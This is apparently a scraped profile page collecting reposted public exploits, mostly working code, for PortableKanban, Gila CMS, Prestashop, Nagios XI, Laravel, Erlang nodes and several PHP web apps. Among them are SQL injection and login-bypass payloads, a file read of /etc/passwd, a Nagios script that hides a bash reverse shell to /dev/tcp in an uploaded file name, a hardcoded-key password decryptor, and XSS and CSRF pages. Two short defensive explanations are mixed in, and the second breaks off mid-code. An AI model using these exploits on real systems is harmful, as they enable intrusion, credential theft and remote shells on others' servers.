
Everything posted by HireHackking
-
PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval
# Exploit Title: PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval
# Date: 9 Jan 2021
# Exploit Author: rootabeta
# Vendor Homepage: The original page, https://dmitryivanov.net/, cannot be found at this time of writing. The vulnerable software can be downloaded from https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Software Link: https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
# Version: Tested on 4.3.6578.38136. All versions that use a similar file format are likely vulnerable.
# Tested on: Windows 10 x64. Exploit likely works on all OSs that PBK runs on.

# PortableKanban stores credentials in an encrypted format.
# Reverse engineering the executable allows an attacker to extract credentials from local storage.
# Provide this program with the path to a valid PortableKanban.pk3 file and it will extract the decoded credentials.

import json
import base64
import sys
from des import DesKey  # python3 -m pip install des

try:
    path = sys.argv[1]
except IndexError:
    exit("Supply path to PortableKanban.pk3 as argv1")


def decode(hash):
    # Key and IV are constants recovered from the binary, so every install
    # protects its passwords with the same secret.
    hash = base64.b64decode(hash.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    return key.decrypt(hash, initial=b"XuVUm5fR", padding=True).decode('utf-8')


with open(path) as f:
    try:
        data = json.load(f)
    except ValueError:
        # Start of file sometimes contains junk - this automatically seeks valid JSON
        broken = True
        i = 1
        while broken:
            f.seek(i, 0)
            try:
                data = json.load(f)
                broken = False
            except ValueError:
                i += 1

for user in data["Users"]:
    print("{}:{}".format(user["Name"], decode(user["EncryptedPassword"])))
-
Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)
# Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)
# Date: 1.12.2021
# Exploit Author: Enesdex
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0
# Version: x < 2.0.0
# Tested on: Windows 10

import requests
import time

target_url = "http://192.168.1.101:80/Gila/"
cmd = "calc.exe"

# Two halves: a traversal value in the GSESSIONID cookie so the session is
# written over index.php, and a PHP payload carried in the User-Agent header
# so that it ends up inside that file.
url = target_url + "?c=admin"
cookies = {"GSESSIONID": "../../index.php"}
headers = {"User-Agent": "<?php shell_exec('" + cmd + "'); include 'src\\core\\bootstrap.php'; ?>"}

requests.get(url, headers=headers, cookies=cookies)
time.sleep(5)
# Request the overwritten file to trigger execution of the payload.
requests.get(target_url + "/index.php")
-
Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
# Date: 08-01-2021
# Exploit Author: Jaimin Gondaliya
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://www.prestashop.com/en/download
# Version: Prestashop CMS - 1.7.7.0
# Tested on: Windows 10

Parameter: id_product

Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)

Exploit:
http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)
-
SmartAgent 3.1.0 - Privilege Escalation
# Exploit Title: SmartAgent 3.1.0 - Privilege Escalation
# Date: 01-11-2021
# Exploit Author: Orion Hridoy
# Vendor Homepage: https://www.smartagent.io/
# Version: Build 3.1.0
# Tested on: Windows 10/Kali Linux

A low-grade user such as ViewOnly can create an account with SuperUser permission.

Steps To Reproduce:
1. Create a user with ViewOnly
2. Visit https://demo.localhost.com/#/CampaignManager/users
3. Now you will be able to create an account with SuperUser.

# Python Exploit [Replace With Your Authorization Code]
import requests

session = requests.Session()

# Body of the createUser request; the "role" field is accepted as sent even
# though the calling token only carries the ViewOnly role.
rawBody = "{\"username\":\"orion@hridoy.com \",\"password\":\"Orionhridoy69\",\"appName\":\"AppEngage\",\"role\":\"Admin\",\"android\":\"1\",\"ios\":\"0\",\"kai\":\"0\"}"
headers = {
    "Authorization": "id=orion@gmail.com,engageToken=eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJvcmlvbkBnbWFpbC5jb20iLCJyb2xlcyI6WyJWaWV3T25seSJdLCJhcHBOYW1lIjoiQXBwRW5nYWdlIiwicGxhdGZvcm0iOiJBTkRST0lEIiwiaXNzIjoiRU5BR0FHRSIsImlhdCI6MTYxMDM3NDEyMCwiZXhwIjoxNjExMjM4MTIwfQ.SbnZaRe3-2GOFOm7QDzvIBQCKBAK_GV-wKsMoH4GGChyjUFe2Ij4LiVl5rXsWRfTqNnJXj9fFxYTzkD2-kXlAQ",
    "Accept": "application/json, text/plain, */*",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0",
    "Referer": "https://demo.localhost.com/",
    "Connection": "close",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "DNT": "1",
    "Content-Type": "application/json",
}
response = session.post("https://demo.localhost.com/api/createUser", data=rawBody, headers=headers)
print("User Created With\nUser: orion@hridoy.com\nPass: Orionhridoy69")
-
Cemetery Mapping and Information System 1.0 - Multiple SQL Injections
# Exploit Title: Cemetery Mapping and Information System 1.0 - Multiple SQL Injections
# Exploit Author: Mesut Cetin
# Date: 2021-01-12
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Vulnerable parameter: "Search" bar (POST method)
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0

SQL Injection is a type of injection attack that makes it possible to execute malicious SQL statements. Due to unsanitized user input, the attacker can retrieve the entire SQL database in this case.

Explanation:

person.php takes user input through the search bar at line 45 ("$_POST['search']") and uses it without any sanitization in the following SQL statement (lines 46-49):

$sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%".$search."%'";
$mydb->setQuery($sql);
$cur = $mydb->executeQuery();
$numrows = $mydb->num_rows($cur); //get the number of count

A single quote (') in the search bar under http://localhost/CemeteryMapping/index.php?q=person will result in SQL syntax errors.

Proof of Concept:

Since the PHP code lacks sanitization of the user input, multiple SQL injection queries can be found.

1. Boolean-based SQL injection

POST request to the page /CemeteryMapping/index.php?q=person and use as payload: ' or 1=1 --

search=' or 1=1 --

2. Union-based SQL injection

To retrieve sensitive files like /etc/passwd, use the following payload at the search bar (POST request to http://localhost/CemeteryMapping/index.php?q=person):

search=' UNION SELECT NULL,load_file('/etc/passwd'),NULL,NULL,NULL,NULL,NULL-- -

If you want to enumerate the target system further, replace "load_file('/etc/passwd')" with one of the following MySQL expressions:

@@hostname : Current Hostname
@@tmpdir : Temp Directory
@@datadir : Data Directory
@@version : Version of DB
@@basedir : Base Directory
user() : Current User
database() : Current Database
version() : Version
schema() : Current Database
UUID() : System UUID key
current_user() : Current User
current_user : Current User
system_user() : Current System user
session_user() : Session user
@@GLOBAL.have_symlink : Check if Symlink is enabled or disabled
@@GLOBAL.have_ssl : Check if it has SSL or not

3. Time-based SQL injection

For time-based SQL injection, use the payload: ' AND (SELECT 2634 FROM (SELECT(SLEEP(5)))muaN)-- -

Mitigation:

By using prepared statements and parameterized queries, the SQL injection can be prevented.
-
Erlang Cookie - Remote Code Execution
# Exploit Title: Erlang Cookie - Remote Code Execution
# Date: 2020-05-04
# Exploit Author: 1F98D
# Original Author: Milton Valencia (wetw0rk)
# Software Link: https://www.erlang.org/
# Version: N/A
# Tested on: Debian 9.11 (x64)
# References:
# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
#
# Erlang allows distributed Erlang instances to connect and remotely execute commands.
# Nodes are permitted to connect to each other if they share an authentication cookie;
# this cookie is commonly called ".erlang.cookie"
#

#!/usr/local/bin/python3
import socket
from hashlib import md5
import struct
import sys

TARGET = "192.168.1.1"
PORT = 25672
COOKIE = "XXXXXXXXXXXXXXXXXXXX"
CMD = "whoami"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))

# send_name: 2-byte length, tag 'n', version, flags, our node name
name_msg = b"\x00"
name_msg += b"\x15"
name_msg += b"n"
name_msg += b"\x00\x07"
name_msg += b"\x00\x03\x49\x9c"
name_msg += b"AAAAAA@AAAAAAA"
s.send(name_msg)

s.recv(5)  # Receive "ok" message
challenge = s.recv(1024)  # Receive "challenge" message
challenge = struct.unpack(">I", challenge[9:13])[0]
print("Extracted challenge: {}".format(challenge))

# challenge reply: tag 'r', our own challenge, md5(cookie + decimal challenge)
challenge_reply = b"\x00\x15"
challenge_reply += b"r"
challenge_reply += b"\x01\x02\x03\x04"
challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()
s.send(challenge_reply)

challenge_res = s.recv(1024)
if len(challenge_res) == 0:
    print("Authentication failed, exiting")
    sys.exit(1)
print("Authentication successful")

# ETF-encoded control message (REG_SEND to the 'rex' rpc process) followed by
# the message {call, os, cmd, [CMD], user}
ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"
msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k'
msg += struct.pack(">H", len(CMD))
msg += bytes(CMD, 'ascii')
msg += b'jw\x04user'

payload = b'\x70' + ctrl + msg
payload = struct.pack('!I', len(payload)) + payload
print("Sending cmd: '{}'".format(CMD))
s.send(payload)
print(s.recv(1024))
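The cookie check the exploit above passes is a simple challenge/response: the node issues a 32-bit challenge and the peer answers with md5(cookie ++ challenge-as-decimal), exactly what the script builds into its "r" message. The following is an added example, not code from the advisory or from Erlang/OTP: it writes both sides of that check out, and shows why the scheme depends entirely on the cookie's entropy, since the challenge and the digest both cross the wire unencrypted and a captured pair can be tested offline against guesses without touching the target. Cookie values and the candidate list are constructed for the demo.

```python
import hashlib
import hmac
import os
import struct


def gen_digest(cookie: str, challenge: int) -> bytes:
    """The digest carried in the challenge reply: MD5(cookie || str(challenge))."""
    return hashlib.md5(cookie.encode("ascii") + str(challenge).encode("ascii")).digest()


def node_issues_challenge() -> int:
    """Server side: a fresh 32-bit challenge (sent big-endian, as the exploit parses it)."""
    return struct.unpack(">I", os.urandom(4))[0]


def node_verifies(cookie: str, challenge: int, digest: bytes) -> bool:
    """Server side: accept the peer iff its digest was made with our cookie."""
    return hmac.compare_digest(gen_digest(cookie, challenge), digest)


def handshake(client_cookie: str, server_cookie: str) -> bool:
    """Run the exchange locally: returns True when both nodes share the cookie."""
    challenge = node_issues_challenge()          # server -> client
    reply = gen_digest(client_cookie, challenge)  # client -> server
    return node_verifies(server_cookie, challenge, reply)


def guess_cookie_offline(challenge: int, observed_digest: bytes, candidates):
    """Passive attack: test cookie guesses against one sniffed (challenge, digest) pair.

    No packets are sent, so the target sees nothing; only the cookie's
    unpredictability stands between the observer and node-level code execution.
    """
    for candidate in candidates:
        if gen_digest(candidate, challenge) == observed_digest:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed values: a weak cookie and a small guess list.
    ch = node_issues_challenge()
    sniffed = gen_digest("secret", ch)
    print("handshake with shared cookie:", handshake("secret", "secret"))
    print("recovered cookie:", guess_cookie_offline(ch, sniffed, ["rabbit", "changeme", "secret"]))
```

The default cookie written by Erlang is a string of 20 uppercase letters (the shape of the placeholder in the exploit), which is out of reach of a guess list; cookies that were set by hand to a word are not.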
-
Online Movie Streaming 1.0 - Admin Authentication Bypass
# Exploit Title: Online Movie Streaming 1.0 - Admin Authentication Bypass
# Exploit Author: Richard Jones
# Date: 2021-01-13
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Exploit URL: http://TARGET/onlinemovies/Plogin.php

POST /onlinemovies/Plogin.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://TARGET
Connection: close
Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj
Upgrade-Insecure-Requests: 1

mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login=
-
Online Hotel Reservation System 1.0 - Admin Authentication Bypass
# Exploit Title: Online Hotel Reservation System 1.0 - Admin Authentication Bypass
# Exploit Author: Richard Jones
# Date: 2021-01-13
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Exploit URL: http://TARGET/marimar/admin/index.php

POST /marimar/admin/login.php HTTP/1.1
Host: TARGET
Content-Length: 57
Connection: close
Cookie: PHPSESSID=82sevuai2qhh9h8b5jbucn0616

email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin=
-
Online Shopping Cart System 1.0 - 'id' SQL Injection
# Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection
# Date: 14.1.2021
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14668&title=Online+Shopping+Cart+System+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Kali Linux

Use SQLMAP:

sqlmap -u "localhost/cart_remove.php?id=1" --dbs --batch --level 3 --risk 3
-
Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)
# Exploit Title: Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)
# Date: 19/12/2020
# Exploit Author: Haboob Team (https://haboob.sa)
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Version: Nagios XI 5.7.x
# Tested on: (Ubuntu 18.04 / PHP 7.2.24) & Vendor's custom VM
# CVE: CVE-2020-35578

#!/usr/bin/python3
# pip3 install bs4 lxml
import requests
import sys
from bs4 import BeautifulSoup
import base64
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

if len(sys.argv) != 6:
    print("[~] Usage : python3 nagiosxi-rce.py http(s)://url username password reverse_ip reverse_port")
    print("[~] Example : python3 nagiosxi-rce.py https://192.168.224.139 nagiosadmin P@ssw0rd 192.168.224.138 443")
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]

request = requests.session()


def login():
    # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks)
    nsp_str_req = request.get(url + "/nagiosxi/login.php", verify=False)
    content = nsp_str_req.text
    soup = BeautifulSoup(content, "lxml")
    nsp_str = soup.find_all('input')[0].get('value')
    print("[+] Extract login nsp token : %s" % nsp_str)

    # Login
    login_info = {
        "nsp": nsp_str,
        "pageopt": "login",
        "username": username,
        "password": password
    }
    login_request = request.post(url + "/nagiosxi/login.php", login_info, verify=False)
    login_text = login_request.text

    # Check Login Status
    if "Core Config Manager" in login_text:
        return True
    else:
        print("[-] Login ... Failed!")
        return False


def execute_payload():
    # Request nsp value (Nagios Session Protection, used to prevent CSRF attacks)
    print("[+] Request upload form ...")
    nsp_str_req = request.get(url + "/nagiosxi/admin/monitoringplugins.php", verify=False)
    content = nsp_str_req.text
    soup = BeautifulSoup(content, "lxml")
    nsp_str = soup.find_all('input')[1].get('value')
    print("[+] Extract upload nsp token : %s" % nsp_str)

    # Payload Base64 Encoding
    payload_decoded = "bash -i >& /dev/tcp/%s/%s 0>&1" % (ip, port)
    payload_bytes = payload_decoded.encode('ascii')
    base64_bytes = base64.b64encode(payload_bytes)
    payload_encoded = base64_bytes.decode('ascii')
    # The injection point is the uploaded file's name, not its content
    payload = ";echo " + payload_encoded + " | base64 -d | bash;#"
    print("[+] Base64 encoded payload : %s" % payload)

    # Payload Execution
    multipart_form_data = {
        'upload': (None, '', None),
        'nsp': (None, nsp_str, None),
        'uploadedfile': (payload, 'whatever', 'text/plain'),
        'convert_to_unix': (None, '1', None),
    }
    print("[+] Sending payload ...")
    print("[+] Check your nc ...")
    rce = request.post(url + "/nagiosxi/admin/monitoringplugins.php", files=multipart_form_data, verify=False)


if login():
    print("[+] Login ... Success!")
    execute_payload()
-
Laravel 8.4.2 debug mode - Remote code execution
# Exploit Title: Laravel 8.4.2 debug mode - Remote code execution
# Date: 1.14.2021
# Exploit Author: SunCSR Team
# Vendor Homepage: https://laravel.com/
# References:
# https://www.ambionics.io/blog/laravel-debug-rce
# https://viblo.asia/p/6J3ZgN8PKmB
# Version: <= 8.4.2
# Tested on: Ubuntu 18.04 + nginx + php 7.4.3
# Github POC: https://github.com/khanhnv-2091/laravel-8.4.2-rce

#!/usr/bin/env python3
import requests, sys, re, os

header = {
    "Accept": "application/json"
}

# Ignition's MakeViewVariableOptionalSolution reads and writes the file named
# in viewFile; php:// wrappers turn that into a write primitive on the log.
data = {
    "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
    "parameters": {
        "variableName": "cm0s",
        "viewFile": ""
    }
}


def clear_log(url='', viewFile=''):
    global data
    data['parameters']['viewFile'] = viewFile
    while (requests.post(url=url, json=data, headers=header, verify=False).status_code != 200):
        pass
    requests.post(url=url, json=data, headers=header, verify=False)
    requests.post(url=url, json=data, headers=header, verify=False)


def create_payload(url='', viewFile=''):
    global data
    data['parameters']['viewFile'] = viewFile
    resp = requests.post(url=url, json=data, headers=header, verify=False)
    if resp.status_code == 500 and f'file_get_contents({viewFile})' in resp.text:
        return True
    return False


def convert(url='', viewFile=''):
    global data
    data['parameters']['viewFile'] = viewFile
    resp = requests.post(url=url, json=data, headers=header, verify=False)
    if resp.status_code == 200:
        return True
    return False


def exploited(url='', viewFile=''):
    global data
    data['parameters']['viewFile'] = viewFile
    resp = requests.post(url=url, json=data, headers=header, verify=False)
    if resp.status_code == 500 and 'cannot be empty' in resp.text:
        m = re.findall(r'\{(.|\n)+\}((.|\n)*)', resp.text)
        print()
        print(m[0][1])


def generate_payload(command='', padding=0):
    # Build a phar with phpggc, base64 it and expand every byte to "X=00" so the
    # quoted-printable/utf-16 filter chain on the server reconstructs it.
    if '/' in command:
        command = command.replace('/', '\\/')
    command = command.replace('\'', '\\\'')
    os.system(r'''php -d'phar.readonly=0' ./phpggc/phpggc monolog/rce1 system '%s' --phar phar -o php://output | base64 -w0 | sed -E 's/./\0=00/g' > payload.txt''' % (command))
    payload = ''
    with open('payload.txt', 'r') as fp:
        payload = fp.read()
    payload = payload.replace('==', '=3D=')
    for i in range(padding):
        payload += '=00'
    os.system('rm -rf payload.txt')
    return payload


def main():
    if len(sys.argv) < 4:
        print('Usage: %s url path-log command\n' % (sys.argv[0]))
        print('\tEx: %s http(s)://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log \'id\'' % (sys.argv[0]))
        exit(1)
    if not os.path.isfile('./phpggc/phpggc'):
        print('Phpggc not found!')
        print('Run command: git clone https://github.com/ambionics/phpggc.git')
        os.system('git clone https://github.com/ambionics/phpggc.git')

    url = sys.argv[1]
    path_log = sys.argv[2]
    command = sys.argv[3]
    padding = 0

    payload = generate_payload(command, padding)
    if not payload:
        print('Generate payload error!')
        exit(1)

    # Accept a bare host:port as well as a full URL; the endpoint is always
    # appended (the original only appended it when a scheme was present).
    if not url.startswith('http'):
        url = 'http://' + url
    url = url + '/_ignition/execute-solution'

    print('\nExploit...')
    clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s' % (path_log))
    create_payload(url, 'AA')
    create_payload(url, payload)
    while (not convert(url, 'php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=%s' % (path_log))):
        clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s' % (path_log))
        create_payload(url, 'AA')
        padding += 1
        payload = generate_payload(command, padding)
        create_payload(url, payload)
    exploited(url, 'phar://%s' % (path_log))


if __name__ == '__main__':
    main()
-
WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS)
# Date: 14/01/2021
# Exploit Author: Rahul Ramakant Singh
# Vendor Homepage: https://ghozylab.com/plugins/
# Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/
# Version: 1.1.7
# Tested on: Windows

Steps:
1. Install WordPress 5.6
2. Install and activate the "Contact Form Plugin" plugin.
3. Go to the "Contact Form Plugin" plugin section and click on the add new form button.
4. Fill in all required details, click on the save button and capture the request in a proxy tool like Burp Suite.
5. Append the JavaScript payload in the "Email Header" field as mentioned below: "<sc><svg/onload=alert(454)>"
6. You will observe that the payload is stored and reflected in the response, and the malicious JavaScript payload is executed, giving a pop-up.
-
OWASP Juice Shop (2) - Practice range, difficulty ⭐
In the previous article we covered the installation of OWASP Juice Shop. This article follows in my cousin's footsteps to get through the levels, covering the one-star challenges.

Bonus Payload
Description: Use the bonus payload in the DOM XSS challenge.
Payload: just paste the code into the search box.
<iframe width='100%' height='166' scrolling='no' frameborder='no' allow='autoplay' src='https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true'></iframe>

DOM XSS
Description: DOM-based XSS attack.
Payload: <iframe src='javascript:alert(`xss`)'>

Confidential Files
Description: Check the confidential documents.
We clicked "About Us" and found a hyperlink. Click the hyperlink and capture the request in Burp. Modify the part of the path in front of ftp and you can see the following file information. Read each file in turn and this level is passed.

Bully Chatbot
This level is very simple: chat with the bot to obtain a discount coupon. When the chat message contains a code, the bot sends you a discount coupon.

Exposed Metrics
Description: Find the server data exposed by backend services using common monitoring software.
By reading the documentation on the official website, you can find the default backend entry address (localhost:3000/metrics).

Missing Encoding
Description: Retrieve the photo of Bjoern's cat in "Brave Mode".
Click on the photo wall and you find that one image is not loaded. Inspecting the image element shows that the URL of the image is
<img _ngcontent-utp-c241='' class='image' src='assets/public/images/uploads/-#zatschi-#whoneedsfourlegs-1572600969477.jpg' alt=' #zatschi #whoneedsfourlegs'>
The image here is not loaded because the URL contains special characters that need to be encoded; the browser converts them, which causes an error. Change the # in the URL to %23.

Outdated Allowlist
Search the JS files for the keyword redirect, then just visit that URL.

Repetitive Registration
Open the registration page, inspect the button element and delete disabled='true'. Now enter only the user name, leave the rest empty, and you can register directly.

Zero Stars
On the customer feedback page, inspect the button element and remove disabled='true'. Now you only need to enter the CAPTCHA to submit.
-
PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)
# Exploit Title: PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)
# Date: 2020-12-21
# Exploit Author: Mohamed Oosman B S
# Vendor Homepage: https://www.php-fusion.co.uk/
# Software Link: https://www.php-fusion.co.uk/phpfusion_9_downloads.php
# Version: 9.03.90 and below
# Tested on: Windows 10
# CVE : CVE-2020-35687

1. Description:

PHP-Fusion version 9.03.90 is vulnerable to a CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged-in victim.

2. Proof of Concept

As the requests for deleting the admin shoutbox are sent using the GET method, the CSRF attack to delete an attacker-controlled shoutbox message can be performed by having the admin visit
https://TARGET.com/infusions/shoutbox_panel/shoutbox_archive.php?s_action=delete&shout_id=1
directly, after getting to know the shout_id of the message, as it is sequential.

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://TARGET/infusions/shoutbox_panel/shoutbox_archive.php">
      <input type="hidden" name="s_action" value="delete" />
      <input type="hidden" name="shout_id" value="3" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection
# Exploit Title: Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection
# Exploit Author: Mesut Cetin
# Date: 2021-01-14
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0

######## Description ########

Vulnerable to SQL Injection.

// vulnerable parameter at include/room.php, line 25:
$mydb->setQuery("SELECT * FROM ".self::$tbl_name." Where `ROOMID`= {id} LIMIT 1");

######## Proof of Concept #########

The 'id' parameter at http://localhost/marimar/admin/mod_room/index.php?view=edit&id=11 is vulnerable to time-based SQL injection.

Payload: (select*from(select(sleep(10)))a)

Proof of Concept:
http://localhost/marimar/admin/mod_room/index.php?view=edit&id=(select*from(select(sleep(10)))a)
-
Online Hotel Reservation System 1.0 - 'description' Stored Cross-site Scripting
# Exploit Title: Online Hotel Reservation System 1.0 - Stored Cross-site Scripting
# Exploit Author: Mesut Cetin
# Date: 2021-01-14
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0

######## Description ########

The room 'description' parameter is vulnerable to stored Cross-site Scripting.

######## Proof of Concept #########

Log in with administrator credentials at http://localhost/admin with admin:admin and click on the "Rooms" tab.

Edit the "description" parameter: 1<script>alert('document.cookie')</script>

Any user at http://localhost/marimar/index.php will get the XSS pop-up with their cookie values.
-
Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)
# Exploit Title: Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)
# Exploit Author: Mesut Cetin
# Date: 2021-01-14
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0

######## Description ########

Vulnerable to Cross-site request forgery (CSRF), which can lead to full account takeover of the Administrator account.

######## Proof of Concept #########

Send the victim the following PoC:

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/marimar/admin/mod_users/controller.php?action=edit" method="POST">
      <input type="hidden" name="USERID" value="1" />
      <input type="hidden" name="UNAME" value="Anonymous" />
      <input type="hidden" name="USERNAME" value="admin" />
      <input type="hidden" name="deptid" value="" />
      <input type="hidden" name="UPASS" value="admin" /> <!-- change this to the new password you wish -->
      <input type="hidden" name="ROLE" value="Administrator" />
      <input type="hidden" name="deptid" value="" />
      <input type="hidden" name="PHONE" value="912852478" />
      <input type="hidden" name="save" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
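Both CSRF PoCs on this page (the PHP-Fusion shoutbox deletion, which is a plain GET, and the hotel reservation password change, an auto-submitted POST from an attacker's page) work because the server accepts the browser's ambient session cookie as the only proof that the user meant to act. The following is an added example, not code from either advisory or application: a server-side gate written in Python that applies the three checks a fix needs (no state change on GET, Origin/Referer must match the site, a per-session synchroniser token must be present and compared in constant time) and runs the two PoCs through it alongside a legitimate submit. The site origin and the request shapes are constructed assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://localhost"   # assumption: scheme://host the app is served from
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def issue_token(session):
    """Store a fresh per-session token; the real form embeds it as csrf_token."""
    session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def state_change_allowed(method, headers, form, session):
    """Decide whether a request may change state. Returns (ok, reason)."""
    # 1. Never change state on GET: a link or an <img src> is enough to fire it.
    if method.upper() not in STATE_CHANGING:
        return False, "state change via GET"
    # 2. The browser sets Origin (or at least Referer) and a page on another
    #    site cannot forge it; fail closed when neither is present.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "no Origin/Referer"
    parts = urlsplit(source)
    if parts.scheme + "://" + parts.netloc != SITE_ORIGIN:
        return False, "cross-site origin"
    # 3. Synchroniser token: the attacker's hidden-field form cannot know it.
    expected = session.get("csrf", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "bad token"
    return True, "ok"


def replay_page_pocs():
    """Run the two PoCs from this page plus a legitimate submit through the gate."""
    session = {}
    token = issue_token(session)
    # PHP-Fusion style: deletion by GET with the id in the query string.
    fusion = state_change_allowed(
        "GET", {"Referer": "http://localhost/infusions/shoutbox_panel/"},
        {"s_action": "delete", "shout_id": "3"}, session)
    # Hotel reservation style: auto-submitted POST from an attacker-hosted page.
    hotel = state_change_allowed(
        "POST", {"Origin": "http://attacker.example"},
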